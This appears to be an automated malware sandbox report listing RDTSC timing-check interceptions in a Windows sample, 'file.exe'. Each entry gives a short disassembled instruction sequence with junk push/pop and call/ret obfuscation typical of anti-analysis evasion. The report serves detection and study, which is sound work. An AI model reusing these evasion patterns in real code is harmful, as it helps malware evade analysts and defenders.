            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C3AE91 second address: C3AE9C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C07B0C second address: C07B16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C07B16 second address: C07B22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F82E8EDE516h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C07B22 second address: C07B27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C07B27 second address: C07B2D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C07B2D second address: C07B31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C07B31 second address: C07B3B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C07B3B second address: C07B3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C07B3F second address: C07B52 instructions: 0x00000000 rdtsc 0x00000002 je 00007F82E8EDE516h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C07B52 second address: C07B58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C07B58 second address: C07B61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C3D4FA second address: C3D4FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C3D4FE second address: C3D504 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C3D504 second address: C3D50A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C3D644 second address: C3D652 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 mov eax, dword ptr [eax] 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C3D7AA second address: C3D7B8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 mov eax, dword ptr [eax] 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C42362 second address: C4236D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4236D second address: C42380 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jnl 00007F82E84F6186h 0x00000009 pop ebx 0x0000000a pushad 0x0000000b jo 00007F82E84F6186h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C42380 second address: C42393 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jbe 00007F82E8EDE51Eh 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C42393 second address: C423A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 jmp 00007F82E84F618Ah 0x0000000a jc 00007F82E84F6186h 0x00000010 pop ebx 0x00000011 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C423A9 second address: C423AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0B274 second address: C0B297 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F82E84F6197h 0x00000007 push eax 0x00000008 push edx 0x00000009 jp 00007F82E84F6186h 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0B297 second address: C0B2B6 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007F82E8EDE51Ch 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push edi 0x0000000e push eax 0x0000000f push edx 0x00000010 jg 00007F82E8EDE516h 0x00000016 push edx 0x00000017 pop edx 0x00000018 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0B2B6 second address: C0B2BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0B2BA second address: C0B2CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F82E8EDE516h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0B2CA second address: C0B2CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0B2CE second address: C0B2D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C41854 second address: C4185A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4185A second address: C4186C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a jnl 00007F82E8EDE516h 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4186C second address: C41886 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F82E84F6186h 0x00000008 jmp 00007F82E84F618Ah 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C41C83 second address: C41C8D instructions: 0x00000000 rdtsc 0x00000002 jns 00007F82E8EDE516h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C41C8D second address: C41C9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jng 00007F82E84F6186h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C42AF8 second address: C42B01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C42B01 second address: C42B41 instructions: 0x00000000 rdtsc 0x00000002 js 00007F82E84F6186h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d jmp 00007F82E84F6198h 0x00000012 jno 00007F82E84F6190h 0x00000018 jmp 00007F82E84F618Ah 0x0000001d popad 0x0000001e mov eax, dword ptr [esp+04h] 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C42B41 second address: C42B45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C42B45 second address: C42B4F instructions: 0x00000000 rdtsc 0x00000002 jp 00007F82E84F6186h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C42CE7 second address: C42CED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C42CED second address: C42CF1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C42E73 second address: C42E7D instructions: 0x00000000 rdtsc 0x00000002 jns 00007F82E8EDE516h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C43874 second address: C43878 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C438F1 second address: C438F6 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C438F6 second address: C43904 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pop edi 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C43904 second address: C4390A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C45E29 second address: C45E2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C45509 second address: C4552C instructions: 0x00000000 rdtsc 0x00000002 jg 00007F82E8EDE518h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F82E8EDE524h 0x00000014 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C472FF second address: C47305 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C47305 second address: C47314 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F82E8EDE51Bh 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4700B second address: C4700F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4700F second address: C47018 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C47C79 second address: C47C7D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C491AF second address: C4925B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop ebx 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push edi 0x0000000c call 00007F82E8EDE518h 0x00000011 pop edi 0x00000012 mov dword ptr [esp+04h], edi 0x00000016 add dword ptr [esp+04h], 0000001Dh 0x0000001e inc edi 0x0000001f push edi 0x00000020 ret 0x00000021 pop edi 0x00000022 ret 0x00000023 jo 00007F82E8EDE51Ch 0x00000029 mov edi, dword ptr [ebp+12450B32h] 0x0000002f movsx esi, dx 0x00000032 push 00000000h 0x00000034 push 00000000h 0x00000036 push 00000000h 0x00000038 push eax 0x00000039 call 00007F82E8EDE518h 0x0000003e pop eax 0x0000003f mov dword ptr [esp+04h], eax 0x00000043 add dword ptr [esp+04h], 0000001Dh 0x0000004b inc eax 0x0000004c push eax 0x0000004d ret 0x0000004e pop eax 0x0000004f ret 0x00000050 jmp 00007F82E8EDE526h 0x00000055 xchg eax, ebx 0x00000056 push edx 0x00000057 js 00007F82E8EDE52Eh 0x0000005d jmp 00007F82E8EDE528h 0x00000062 pop edx 0x00000063 push eax 0x00000064 jo 00007F82E8EDE524h 0x0000006a push eax 0x0000006b push edx 0x0000006c jp 00007F82E8EDE516h 0x00000072 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4C5B5 second address: C4C5BA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4C5BA second address: C4C5C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C48579 second address: C4857D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4857D second address: C48587 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C48587 second address: C4858B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4DD22 second address: C4DD2C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F82E8EDE516h 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4CCC6 second address: C4CCCC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4CDB2 second address: C4CDB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4CDB6 second address: C4CDBC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4EC7A second address: C4EC80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C51DA8 second address: C51DB4 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F82E84F6186h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C534A3 second address: C534C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F82E8EDE516h 0x0000000a pop ecx 0x0000000b push esi 0x0000000c jmp 00007F82E8EDE524h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BFF7BD second address: BFF7C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BFF7C3 second address: BFF7C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BFF7C7 second address: BFF804 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F82E84F6186h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edx 0x0000000d jno 00007F82E84F6186h 0x00000013 pop edx 0x00000014 pop esi 0x00000015 pushad 0x00000016 jmp 00007F82E84F6199h 0x0000001b push ecx 0x0000001c pushad 0x0000001d popad 0x0000001e pop ecx 0x0000001f push eax 0x00000020 push edx 0x00000021 ja 00007F82E84F6186h 0x00000027 push esi 0x00000028 pop esi 0x00000029 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C539F8 second address: C539FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4FF01 second address: C4FF20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F82E84F6197h 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C56A92 second address: C56AB4 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F82E8EDE51Fh 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F82E8EDE51Ah 0x00000013 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C54B99 second address: C54BAD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F82E84F6190h 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C54BAD second address: C54BB1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C54BB1 second address: C54C5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b mov dword ptr [ebp+122D2430h], eax 0x00000011 jmp 00007F82E84F6194h 0x00000016 push dword ptr fs:[00000000h] 0x0000001d mov dword ptr [ebp+122D25DBh], esi 0x00000023 mov dword ptr fs:[00000000h], esp 0x0000002a jmp 00007F82E84F618Eh 0x0000002f mov eax, dword ptr [ebp+122D1729h] 0x00000035 push 00000000h 0x00000037 push eax 0x00000038 call 00007F82E84F6188h 0x0000003d pop eax 0x0000003e mov dword ptr [esp+04h], eax 0x00000042 add dword ptr [esp+04h], 0000001Bh 0x0000004a inc eax 0x0000004b push eax 0x0000004c ret 0x0000004d pop eax 0x0000004e ret 0x0000004f push FFFFFFFFh 0x00000051 push 00000000h 0x00000053 push ebp 0x00000054 call 00007F82E84F6188h 0x00000059 pop ebp 0x0000005a mov dword ptr [esp+04h], ebp 0x0000005e add dword ptr [esp+04h], 00000018h 0x00000066 inc ebp 0x00000067 push ebp 0x00000068 ret 0x00000069 pop ebp 0x0000006a ret 0x0000006b or dword ptr [ebp+122D221Bh], ebx 0x00000071 nop 0x00000072 pushad 0x00000073 jp 00007F82E84F6188h 0x00000079 push eax 0x0000007a push edx 0x0000007b jbe 00007F82E84F6186h 0x00000081 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C54C5B second address: C54C71 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F82E8EDE516h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c jns 00007F82E8EDE520h 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C55C8C second address: C55C9E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F82E84F618Eh 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C56C4E second address: C56C7C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F82E8EDE523h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F82E8EDE524h 0x00000011 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C56C7C second address: C56C83 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5BAE7 second address: C5BB73 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 jmp 00007F82E8EDE528h 0x0000000d nop 0x0000000e push 00000000h 0x00000010 push ebp 0x00000011 call 00007F82E8EDE518h 0x00000016 pop ebp 0x00000017 mov dword ptr [esp+04h], ebp 0x0000001b add dword ptr [esp+04h], 00000019h 0x00000023 inc ebp 0x00000024 push ebp 0x00000025 ret 0x00000026 pop ebp 0x00000027 ret 0x00000028 sub dword ptr [ebp+122D19F0h], esi 0x0000002e push 00000000h 0x00000030 mov di, 6BABh 0x00000034 push ecx 0x00000035 jl 00007F82E8EDE519h 0x0000003b movzx ebx, cx 0x0000003e pop edi 0x0000003f push 00000000h 0x00000041 push 00000000h 0x00000043 push edx 0x00000044 call 00007F82E8EDE518h 0x00000049 pop edx 0x0000004a mov dword ptr [esp+04h], edx 0x0000004e add dword ptr [esp+04h], 00000018h 0x00000056 inc edx 0x00000057 push edx 0x00000058 ret 0x00000059 pop edx 0x0000005a ret 0x0000005b mov bx, si 0x0000005e movsx edi, cx 0x00000061 mov dword ptr [ebp+122D3004h], edi 0x00000067 xchg eax, esi 0x00000068 push esi 0x00000069 pushad 0x0000006a push eax 0x0000006b push edx 0x0000006c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5BB73 second address: C5BB79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5DB06 second address: C5DB10 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F82E8EDE516h 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5DB10 second address: C5DB14 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5EA7B second address: C5EA7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C58D06 second address: C58D0A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C58D0A second address: C58D10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C59CC8 second address: C59CCC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5AD35 second address: C5AD39 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5AD39 second address: C5AD50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 jmp 00007F82E84F618Bh 0x0000000e push edi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5AD50 second address: C5ADA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 nop 0x00000007 push esi 0x00000008 add dword ptr [ebp+122D1C79h], edx 0x0000000e pop edi 0x0000000f push dword ptr fs:[00000000h] 0x00000016 mov edi, dword ptr [ebp+122D2301h] 0x0000001c mov dword ptr fs:[00000000h], esp 0x00000023 and di, 3D90h 0x00000028 mov eax, dword ptr [ebp+122D0485h] 0x0000002e mov ebx, dword ptr [ebp+122D1FF6h] 0x00000034 push FFFFFFFFh 0x00000036 jmp 00007F82E8EDE527h 0x0000003b push eax 0x0000003c pushad 0x0000003d pushad 0x0000003e push eax 0x0000003f push edx 0x00000040 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5ADA2 second address: C5ADA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C57CD6 second address: C57CDA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C57CDA second address: C57CE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a rdtsc
